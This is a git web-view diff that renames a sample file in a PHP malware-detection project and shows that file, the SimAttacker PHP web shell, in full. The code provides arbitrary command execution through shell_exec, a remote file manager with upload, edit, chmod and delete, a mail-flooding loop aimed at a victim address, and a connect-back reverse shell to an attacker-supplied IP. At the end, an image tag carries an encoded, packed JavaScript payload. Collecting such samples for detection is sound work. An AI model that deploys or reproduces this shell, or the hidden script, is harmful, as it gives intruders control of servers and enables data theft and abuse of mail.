summaryrefslogtreecommitdiff
path: root/data/samples/classic/simattacker.php
diff options
context:
space:
mode:
authorMathieu Deous2022-05-02 20:18:23 +0200
committerGitHub2022-05-02 20:18:23 +0200
commit48936efa96ae17295be4e0a71be3294f0ec6aef8 (patch)
treef4e69551f1368aa048edf46b7b061600f3668329 /data/samples/classic/simattacker.php
parentbbc738e16f8b637afde58d65196374af98a5e0e2 (diff)
Make application go-install-able and create a docker image
Diffstat (limited to '')
-rw-r--r--data/samples/classic/simattacker.php (renamed from php-malware-finder/samples/classic/simattacker.php)1512
1 files changed, 756 insertions, 756 deletions
diff --git a/php-malware-finder/samples/classic/simattacker.php b/data/samples/classic/simattacker.php
index 79b49d0..7e6f057 100644
--- a/php-malware-finder/samples/classic/simattacker.php
+++ b/data/samples/classic/simattacker.php
@@ -1,756 +1,756 @@
1<? 1<?
2 2
3//download Files Code 3//download Files Code
4 4
5$fdownload=$_GET['fdownload']; 5$fdownload=$_GET['fdownload'];
6 6
7if ($fdownload <> "" ){ 7if ($fdownload <> "" ){
8 8
9// path & file name 9// path & file name
10 10
11$path_parts = pathinfo("$fdownload"); 11$path_parts = pathinfo("$fdownload");
12 12
13$entrypath=$path_parts["basename"]; 13$entrypath=$path_parts["basename"];
14 14
15$name = "$fdownload"; 15$name = "$fdownload";
16 16
17$fp = fopen($name, 'rb'); 17$fp = fopen($name, 'rb');
18 18
19header("Content-Disposition: attachment; filename=$entrypath"); 19header("Content-Disposition: attachment; filename=$entrypath");
20 20
21header("Content-Length: " . filesize($name)); 21header("Content-Length: " . filesize($name));
22 22
23fpassthru($fp); 23fpassthru($fp);
24 24
25exit; 25exit;
26 26
27} 27}
28 28
29?> 29?>
30 30
31 31
32 32
33<html> 33<html>
34 34
35 35
36 36
37<head> 37<head>
38 38
39<meta http-equiv="Content-Language" content="en-us"> 39<meta http-equiv="Content-Language" content="en-us">
40 40
41<meta http-equiv="Content-Type" content="text/html; charset=windows-1252"> 41<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
42 42
43<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title> 43<title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
44<style> 44<style>
45 45
46<!-- 46<!--
47 47
48body { font-family: Tahoma; font-size: 8pt } 48body { font-family: Tahoma; font-size: 8pt }
49 49
50--> 50-->
51 51
52</style> 52</style>
53 53
54</head> 54</head>
55 55
56<body> 56<body>
57 57
58<? 58<?
59 59
60error_reporting(E_ERROR | E_WARNING | E_PARSE); 60error_reporting(E_ERROR | E_WARNING | E_PARSE);
61 61
62 62
63 63
64 //File Edit 64 //File Edit
65 65
66 $fedit=$_GET['fedit']; 66 $fedit=$_GET['fedit'];
67 67
68 if ($fedit <> "" ){ 68 if ($fedit <> "" ){
69 69
70 $fedit=realpath($fedit); 70 $fedit=realpath($fedit);
71 71
72 $lines = file($fedit); 72 $lines = file($fedit);
73 73
74 echo "<form action='' method='POST'>"; 74 echo "<form action='' method='POST'>";
75 75
76echo "<textarea name='savefile' rows=30 cols=80>" ; 76echo "<textarea name='savefile' rows=30 cols=80>" ;
77 77
78foreach ($lines as $line_num => $line) { 78foreach ($lines as $line_num => $line) {
79 79
80 echo htmlspecialchars($line); 80 echo htmlspecialchars($line);
81 81
82} 82}
83 83
84echo "</textarea> 84echo "</textarea>
85 85
86 <input type='text' name='filepath' size='60' value='$fedit'> 86 <input type='text' name='filepath' size='60' value='$fedit'>
87 87
88 <input type='submit' value='save'></form>"; 88 <input type='submit' value='save'></form>";
89 89
90 $savefile=$_POST['savefile']; 90 $savefile=$_POST['savefile'];
91 91
92 $filepath=realpath($_POST['filepath']); 92 $filepath=realpath($_POST['filepath']);
93 93
94 if ($savefile <> "") 94 if ($savefile <> "")
95 95
96 { 96 {
97 97
98 $fp=fopen("$filepath","w+"); 98 $fp=fopen("$filepath","w+");
99 99
100 fwrite ($fp,"") ; 100 fwrite ($fp,"") ;
101 101
102 fwrite ($fp,$savefile) ; 102 fwrite ($fp,$savefile) ;
103 103
104 fclose($fp); 104 fclose($fp);
105 105
106 echo "<script language='javascript'> close()</script>"; 106 echo "<script language='javascript'> close()</script>";
107 107
108 } 108 }
109 109
110exit(); 110exit();
111 111
112 } 112 }
113 113
114?> 114?>
115 115
116<? 116<?
117 117
118// CHmod - PRimission 118// CHmod - PRimission
119 119
120$fchmod=$_GET['fchmod']; 120$fchmod=$_GET['fchmod'];
121 121
122if ($fchmod <> "" ){ 122if ($fchmod <> "" ){
123 123
124$fchmod=realpath($fchmod); 124$fchmod=realpath($fchmod);
125 125
126echo "<center><br> 126echo "<center><br>
127 127
128chmod for :$fchmod<br> 128chmod for :$fchmod<br>
129 129
130<form method='POST' action=''><br> 130<form method='POST' action=''><br>
131 131
132Chmod :<br> 132Chmod :<br>
133 133
134<input type='text' name='chmod0' ><br> 134<input type='text' name='chmod0' ><br>
135 135
136<input type='submit' value='change chmod'> 136<input type='submit' value='change chmod'>
137 137
138</form>"; 138</form>";
139 139
140$chmod0=$_POST['chmod0']; 140$chmod0=$_POST['chmod0'];
141 141
142if ($chmod0 <> ""){ 142if ($chmod0 <> ""){
143 143
144chmod ($fchmod , $chmod0); 144chmod ($fchmod , $chmod0);
145 145
146}else { 146}else {
147 147
148echo "primission Not Allow change Chmod"; 148echo "primission Not Allow change Chmod";
149 149
150} 150}
151 151
152exit(); 152exit();
153 153
154} 154}
155 155
156?> 156?>
157 157
158 158
159 159
160<div align="center"> 160<div align="center">
161 161
162 <table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502"> 162 <table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
163 163
164 <tr> 164 <tr>
165 165
166 <td style="border: 1px dotted #FFCC66" valign="top" rowspan="2"> 166 <td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
167 167
168 <p align="center"><b> 168 <p align="center"><b>
169 169
170 <font face="Tahoma" size="2"><br> 170 <font face="Tahoma" size="2"><br>
171 171
172 </font> 172 </font>
173 173
174 <font color="#D2D200" face="Tahoma" size="2"> 174 <font color="#D2D200" face="Tahoma" size="2">
175 175
176 <span style="text-decoration: none"> 176 <span style="text-decoration: none">
177 177
178 <font color="#000000"> 178 <font color="#000000">
179 179
180 <a href="?id=fm&dir=<? 180 <a href="?id=fm&dir=<?
181 181
182 echo getcwd(); 182 echo getcwd();
183 183
184 ?> 184 ?>
185 185
186 "> 186 ">
187 187
188 <span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p> 188 <span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
189 189
190 <p align="center"><b><a href="?id=cmd"> 190 <p align="center"><b><a href="?id=cmd">
191 191
192 <span style="text-decoration: none"> 192 <span style="text-decoration: none">
193 193
194 <font face="Tahoma" size="2" color="#000000"> 194 <font face="Tahoma" size="2" color="#000000">
195 195
196 CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p> 196 CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
197 197
198 <p align="center"><b><a href="?id=fake-mail"> 198 <p align="center"><b><a href="?id=fake-mail">
199 199
200 <font face="Tahoma" size="2" color="#000000"> 200 <font face="Tahoma" size="2" color="#000000">
201 201
202 <span style="text-decoration: none">Fake mail</span></font></a></b></p> 202 <span style="text-decoration: none">Fake mail</span></font></a></b></p>
203 203
204 <p align="center"><b> 204 <p align="center"><b>
205 205
206 <font face="Tahoma" size="2" color="#000000"> 206 <font face="Tahoma" size="2" color="#000000">
207 207
208 <a href="?id=cshell"> 208 <a href="?id=cshell">
209 209
210 <span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p> 210 <span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
211 211
212 <p align="center"><b> 212 <p align="center"><b>
213 213
214 <font color="#000000" face="Tahoma" size="2"> 214 <font color="#000000" face="Tahoma" size="2">
215 215
216 <a href="?id="> 216 <a href="?id=">
217 217
218 <span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p> 218 <span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
219 219
220 <p>&nbsp;<p align="center">&nbsp;</td> 220 <p>&nbsp;<p align="center">&nbsp;</td>
221 221
222 <td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center"> 222 <td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
223 223
224 <? 224 <?
225 225
226 //******************************************************* 226 //*******************************************************
227 227
228 //Start Programs About US 228 //Start Programs About US
229 229
230 $id=$_GET['id']; 230 $id=$_GET['id'];
231 231
232 232
233 233
234 if ($id=="") { 234 if ($id=="") {
235 235
236 echo " 236 echo "
237 237
238 <font face='Arial Black' color='#808080' size='1'> 238 <font face='Arial Black' color='#808080' size='1'>
239 239
240***************************************************************************<br> 240***************************************************************************<br>
241 241
242&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br> 242&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
243 243
244&nbsp;Programer : Hossein Asgary <br> 244&nbsp;Programer : Hossein Asgary <br>
245 245
246&nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group <br> 246&nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group <br>
247 247
248&nbsp;please : If you find bug or problems in program , tell me by : <br> 248&nbsp;please : If you find bug or problems in program , tell me by : <br>
249 249
250&nbsp;e-mail : admin(at)simorgh-ev(dot)com<br> 250&nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
251 251
252Enjoy :) [Only 4 Best Friends ] <br> 252Enjoy :) [Only 4 Best Friends ] <br>
253 253
254***************************************************************************</font></span></p> 254***************************************************************************</font></span></p>
255 255
256"; 256";
257 257
258 258
259 259
260echo "<font color='#333333' size='2'>OS :". php_uname(); 260echo "<font color='#333333' size='2'>OS :". php_uname();
261 261
262echo "<br>IP :". 262echo "<br>IP :".
263 263
264($_SERVER['REMOTE_ADDR']); 264($_SERVER['REMOTE_ADDR']);
265 265
266echo "</font>"; 266echo "</font>";
267 267
268 268
269 269
270 270
271 271
272 } 272 }
273 273
274 //************************************************************ 274 //************************************************************
275 275
276 //cmd-command line 276 //cmd-command line
277 277
278 $cmd=$_POST['cmd']; 278 $cmd=$_POST['cmd'];
279 279
280 if($id=="cmd"){ 280 if($id=="cmd"){
281 281
282 $result=shell_exec("$cmd"); 282 $result=shell_exec("$cmd");
283 283
284 echo "<br><center><h3> CMD ExeCute </h3></center>" ; 284 echo "<br><center><h3> CMD ExeCute </h3></center>" ;
285 285
286 echo "<center> 286 echo "<center>
287 287
288 <textarea rows=20 cols=70 >$result</textarea><br> 288 <textarea rows=20 cols=70 >$result</textarea><br>
289 289
290 <form method='POST' action=''> 290 <form method='POST' action=''>
291 291
292 <input type='hidden' name='id' value='cmd'> 292 <input type='hidden' name='id' value='cmd'>
293 293
294 <input type='text' size='80' name='cmd' value='$cmd'> 294 <input type='text' size='80' name='cmd' value='$cmd'>
295 295
296 <input type='submit' value='cmd'><br>"; 296 <input type='submit' value='cmd'><br>";
297 297
298 298
299 299
300 300
301 301
302 302
303 303
304 } 304 }
305 305
306 306
307 307
308 //******************************************************** 308 //********************************************************
309 309
310 310
311 311
312 //fake mail = Use victim server 4 DOS - fake mail 312 //fake mail = Use victim server 4 DOS - fake mail
313 313
314 if ( $id=="fake-mail"){ 314 if ( $id=="fake-mail"){
315 315
316 error_reporting(0); 316 error_reporting(0);
317 317
318 echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ; 318 echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
319 319
320 echo "<center><form method='post' action=''> 320 echo "<center><form method='post' action=''>
321 321
322 Victim Mail :<br><input type='text' name='to' ><br> 322 Victim Mail :<br><input type='text' name='to' ><br>
323 323
324 Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br> 324 Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
325 325
326 Comments: 326 Comments:
327 327
328 <br> 328 <br>
329 329
330 <textarea rows='10' cols=50 name='Comments' ></textarea><br> 330 <textarea rows='10' cols=50 name='Comments' ></textarea><br>
331 331
332 <input type='submit' value='Send Mail Strm ' > 332 <input type='submit' value='Send Mail Strm ' >
333 333
334 </form></center>"; 334 </form></center>";
335 335
336 //send Storm Mail 336 //send Storm Mail
337 337
338 $to=$_POST['to']; 338 $to=$_POST['to'];
339 339
340 $nom=$_POST['nom']; 340 $nom=$_POST['nom'];
341 341
342 $Comments=$_POST['Comments']; 342 $Comments=$_POST['Comments'];
343 343
344 if ($to <> "" ){ 344 if ($to <> "" ){
345 345
346 for ($i = 0; $i < $nom ; $i++){ 346 for ($i = 0; $i < $nom ; $i++){
347 347
348 $from = rand (71,1020000000)."@"."Attacker.com"; 348 $from = rand (71,1020000000)."@"."Attacker.com";
349 349
350 $subject= md5("$from"); 350 $subject= md5("$from");
351 351
352 mail($to,$subject,$Comments,"From:$from"); 352 mail($to,$subject,$Comments,"From:$from");
353 353
354 echo "$i is ok"; 354 echo "$i is ok";
355 355
356 } 356 }
357 357
358 echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>"; 358 echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
359 359
360 } 360 }
361 361
362 } 362 }
363 363
364 //******************************************************** 364 //********************************************************
365 365
366 366
367 367
368 //Connect Back -Firewall Bypass 368 //Connect Back -Firewall Bypass
369 369
370 if ($id=="cshell"){ 370 if ($id=="cshell"){
371 371
372 echo "<br>Connect back Shell , bypass Firewalls<br> 372 echo "<br>Connect back Shell , bypass Firewalls<br>
373 373
374 For user :<br> 374 For user :<br>
375 375
376 nc -l -p 1019 <br> 376 nc -l -p 1019 <br>
377 377
378 <hr> 378 <hr>
379 379
380 <form method='POST' action=''><br> 380 <form method='POST' action=''><br>
381 381
382 Your IP & BindPort:<br> 382 Your IP & BindPort:<br>
383 383
384 <input type='text' name='mip' > 384 <input type='text' name='mip' >
385 385
386 <input type='text' name='bport' size='5' value='1019'><br> 386 <input type='text' name='bport' size='5' value='1019'><br>
387 387
388 <input type='submit' value='Connect Back'> 388 <input type='submit' value='Connect Back'>
389 389
390 </form>"; 390 </form>";
391 391
392 $mip=$_POST['mip']; 392 $mip=$_POST['mip'];
393 393
394 $bport=$_POST['bport']; 394 $bport=$_POST['bport'];
395 395
396 if ($mip <> "") 396 if ($mip <> "")
397 397
398 { 398 {
399 399
400 $fp=fsockopen($mip , $bport , $errno, $errstr); 400 $fp=fsockopen($mip , $bport , $errno, $errstr);
401 401
402 if (!$fp){ 402 if (!$fp){
403 403
404 $result = "Error: could not open socket connection"; 404 $result = "Error: could not open socket connection";
405 405
406 } 406 }
407 407
408 else { 408 else {
409 409
410 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n"); 410 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00 ready 2 USe\n*********************************************\n\n");
411 411
412 while(!feof($fp)){ 412 while(!feof($fp)){
413 413
414 fputs ($fp," bash # "); 414 fputs ($fp," bash # ");
415 415
416 $result= fgets ($fp, 4096); 416 $result= fgets ($fp, 4096);
417 417
418 $message=`$result`; 418 $message=`$result`;
419 419
420 fputs ($fp,"--> ".$message."\n"); 420 fputs ($fp,"--> ".$message."\n");
421 421
422 } 422 }
423 423
424 fclose ($fp); 424 fclose ($fp);
425 425
426 } 426 }
427 427
428 } 428 }
429 429
430 } 430 }
431 431
432 432
433 433
434 //******************************************************** 434 //********************************************************
435 435
436 //Spy File Manager 436 //Spy File Manager
437 437
438 $homedir=getcwd(); 438 $homedir=getcwd();
439 439
440 $dir=realpath($_GET['dir'])."/"; 440 $dir=realpath($_GET['dir'])."/";
441 441
442 if ($id=="fm"){ 442 if ($id=="fm"){
443 443
444 echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir 444 echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir
445 445
446 &nbsp;<b> 446 &nbsp;<b>
447 447
448 <form action='' method='GET'> 448 <form action='' method='GET'>
449 449
450 &nbsp;Path:</b> 450 &nbsp;Path:</b>
451 451
452 <input type='hidden' name='id' value='fm'> 452 <input type='hidden' name='id' value='fm'>
453 453
454 <input type='text' name='dir' size='80' value='$dir'> 454 <input type='text' name='dir' size='80' value='$dir'>
455 455
456 <input type='submit' value='dir'> 456 <input type='submit' value='dir'>
457 457
458 </form> 458 </form>
459 459
460 <br>"; 460 <br>";
461 461
462 462
463 463
464 echo " 464 echo "
465 465
466 466
467 467
468<div align='center'> 468<div align='center'>
469 469
470 470
471 471
472<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'> 472<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
473 473
474 <tr> 474 <tr>
475 475
476 <td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td> 476 <td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
477 477
478 <td height='28' width='82' align='center'> 478 <td height='28' width='82' align='center'>
479 479
480 <font color='#000080' size='2'><b>Size KByte</b></font></td> 480 <font color='#000080' size='2'><b>Size KByte</b></font></td>
481 481
482 <td height='28' width='83' align='center'> 482 <td height='28' width='83' align='center'>
483 483
484 <font color='#008000' size='2'><b>Download</b></font></td> 484 <font color='#008000' size='2'><b>Download</b></font></td>
485 485
486 <td height='28' width='66' align='center'> 486 <td height='28' width='66' align='center'>
487 487
488 <font color='#FF9933' size='2'><b>Edit</b></font></td> 488 <font color='#FF9933' size='2'><b>Edit</b></font></td>
489 489
490 <td height='28' width='75' align='center'> 490 <td height='28' width='75' align='center'>
491 491
492 <font color='#999999' size='2'><b>Chmod</b></font></td> 492 <font color='#999999' size='2'><b>Chmod</b></font></td>
493 493
494 <td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td> 494 <td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
495 495
496 </tr>"; 496 </tr>";
497 497
498 if (is_dir($dir)){ 498 if (is_dir($dir)){
499 499
500 if ($dh=opendir($dir)){ 500 if ($dh=opendir($dir)){
501 501
502 while (($file = readdir($dh)) !== false) { 502 while (($file = readdir($dh)) !== false) {
503 503
504 $fsize=round(filesize($dir . $file)/1024); 504 $fsize=round(filesize($dir . $file)/1024);
505 505
506 506
507 507
508 508
509 509
510 echo " 510 echo "
511 511
512 <tr> 512 <tr>
513 513
514 <th width='250' height='22' align='left' nowrap>"; 514 <th width='250' height='22' align='left' nowrap>";
515 515
516 if (is_dir($dir.$file)) 516 if (is_dir($dir.$file))
517 517
518 { 518 {
519 519
520 echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>"; 520 echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
521 521
522 } 522 }
523 523
524 else { 524 else {
525 525
526 echo "<font size='2' color='#666666'>&nbsp;$file "; 526 echo "<font size='2' color='#666666'>&nbsp;$file ";
527 527
528 } 528 }
529 529
530 echo "</a></font></th> 530 echo "</a></font></th>
531 531
532 <td width='113' align='center' nowrap><font color='#000080' size='2'><b>"; 532 <td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
533 533
534 if (is_file($dir.$file)) 534 if (is_file($dir.$file))
535 535
536 { 536 {
537 537
538 echo "$fsize"; 538 echo "$fsize";
539 539
540 } 540 }
541 541
542 else { 542 else {
543 543
544 echo "&nbsp; "; 544 echo "&nbsp; ";
545 545
546 } 546 }
547 547
548 echo " 548 echo "
549 549
550 </b></font></td> 550 </b></font></td>
551 551
552 <td width='103' align='center' nowrap>"; 552 <td width='103' align='center' nowrap>";
553 553
554 if (is_file($dir.$file)){ 554 if (is_file($dir.$file)){
555 555
556 if (is_readable($dir.$file)){ 556 if (is_readable($dir.$file)){
557 557
558 echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download"; 558 echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
559 559
560 }else { 560 }else {
561 561
562 echo "<font size='1' color='#FF0000'><b>No ReadAble</b>"; 562 echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
563 563
564 } 564 }
565 565
566 }else { 566 }else {
567 567
568 echo "&nbsp;"; 568 echo "&nbsp;";
569 569
570 } 570 }
571 571
572 echo " 572 echo "
573 573
574 </a></font></td> 574 </a></font></td>
575 575
576 <td width='77' align='center' nowrap>"; 576 <td width='77' align='center' nowrap>";
577 577
578 if (is_file($dir.$file)) 578 if (is_file($dir.$file))
579 579
580 { 580 {
581 581
582 if (is_readable($dir.$file)){ 582 if (is_readable($dir.$file)){
583 583
584 echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit"; 584 echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
585 585
586 }else { 586 }else {
587 587
588 echo "<font size='1' color='#FF0000'><b>No ReadAble</b>"; 588 echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
589 589
590 } 590 }
591 591
592 }else { 592 }else {
593 593
594 echo "&nbsp;"; 594 echo "&nbsp;";
595 595
596 } 596 }
597 597
598 echo " 598 echo "
599 599
600 </a></font></td> 600 </a></font></td>
601 601
602 <td width='86' align='center' nowrap>"; 602 <td width='86' align='center' nowrap>";
603 603
604 if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { 604 if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
605 605
606 echo "<font size='1' color='#999999'>Dont in windows"; 606 echo "<font size='1' color='#999999'>Dont in windows";
607 607
608 } 608 }
609 609
610 else { 610 else {
611 611
612 echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod"; 612 echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
613 613
614 } 614 }
615 615
616 echo "</a></font></td> 616 echo "</a></font></td>
617 617
618 <td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td> 618 <td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
619 619
620 </tr> 620 </tr>
621 621
622 "; 622 ";
623 623
624 } 624 }
625 625
626 closedir($dh); 626 closedir($dh);
627 627
628 } 628 }
629 629
630 } 630 }
631 631
632 echo "</table> 632 echo "</table>
633 633
634<form enctype='multipart/form-data' action='' method='POST'> 634<form enctype='multipart/form-data' action='' method='POST'>
635 635
636 <input type='hidden' name='MAX_FILE_SIZE' value='300000' /> 636 <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
637 637
638 Send this file: <input name='userfile' type='file' /> 638 Send this file: <input name='userfile' type='file' />
639 639
640 <inpt type='hidden' name='Fupath' value='$dir'> 640 <inpt type='hidden' name='Fupath' value='$dir'>
641 641
642 <input type='submit' value='Send File' /> 642 <input type='submit' value='Send File' />
643 643
644</form> 644</form>
645 645
646 </div>"; 646 </div>";
647 647
648 } 648 }
649 649
650//Upload Files 650//Upload Files
651 651
652$rpath=$_GET['dir']; 652$rpath=$_GET['dir'];
653 653
654if ($rpath <> "") { 654if ($rpath <> "") {
655 655
656$uploadfile = $rpath."/" . $_FILES['userfile']['name']; 656$uploadfile = $rpath."/" . $_FILES['userfile']['name'];
657 657
658print "<pre>"; 658print "<pre>";
659 659
660if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { 660if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
661 661
662echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>"; 662echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
663 663
664echo "<script language='javascript'> history.back(2)</script>"; 664echo "<script language='javascript'> history.back(2)</script>";
665 665
666} 666}
667 667
668 } 668 }
669 669
670 //file deleted 670 //file deleted
671 671
672$frpath=$_GET['fdelete']; 672$frpath=$_GET['fdelete'];
673 673
674if ($frpath <> "") { 674if ($frpath <> "") {
675 675
676if (is_dir($frpath)){ 676if (is_dir($frpath)){
677 677
678$matches = glob($frpath . '/*.*'); 678$matches = glob($frpath . '/*.*');
679 679
680if ( is_array ( $matches ) ) { 680if ( is_array ( $matches ) ) {
681 681
682 foreach ( $matches as $filename) { 682 foreach ( $matches as $filename) {
683 683
684 unlink ($filename); 684 unlink ($filename);
685 685
686 rmdir("$frpath"); 686 rmdir("$frpath");
687 687
688echo "<script language='javascript'> alert('Success! Please refresh')</script>"; 688echo "<script language='javascript'> alert('Success! Please refresh')</script>";
689 689
690echo "<script language='javascript'> history.back(1)</script>"; 690echo "<script language='javascript'> history.back(1)</script>";
691 691
692 } 692 }
693 693
694 } 694 }
695 695
696 } 696 }
697 697
698 else{ 698 else{
699 699
700echo "<script language='javascript'> alert('Success! Please refresh')</script>"; 700echo "<script language='javascript'> alert('Success! Please refresh')</script>";
701 701
702unlink ("$frpath"); 702unlink ("$frpath");
703 703
704echo "<script language='javascript'> history.back(1)</script>"; 704echo "<script language='javascript'> history.back(1)</script>";
705 705
706exit(0); 706exit(0);
707 707
708 708
709 709
710 } 710 }
711 711
712 712
713 713
714 714
715 715
716} 716}
717 717
718 ?> 718 ?>
719 719
720 720
721 721
722 </td> 722 </td>
723 723
724 </tr> 724 </tr>
725 725
726 <tr> 726 <tr>
727 727
728 <td style="border: 1px dotted #FFCC66"> 728 <td style="border: 1px dotted #FFCC66">
729 729
730 <p align="center"><font color="#666666" size="1" face="Tahoma"><br> 730 <p align="center"><font color="#666666" size="1" face="Tahoma"><br>
731 731
732 Copyright 2004-Simorgh Security<br> 732 Copyright 2004-Simorgh Security<br>
733 733
734 Hossein-Asgari<br> 734 Hossein-Asgari<br>
735 735
736 </font><font color="#c0c0c0" size="1" face="Tahoma"> 736 </font><font color="#c0c0c0" size="1" face="Tahoma">
737 737
738 <a style="TEXT-DECORATION: none" href="http://www.r57.biz"> 738 <a style="TEXT-DECORATION: none" href="http://www.r57.biz">
739 739
740 <font color="#666666">www.r57.biz</font></a></font></td> 740 <font color="#666666">www.r57.biz</font></a></font></td>
741 741
742 </tr> 742 </tr>
743 743
744 </table> 744 </table>
745<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellv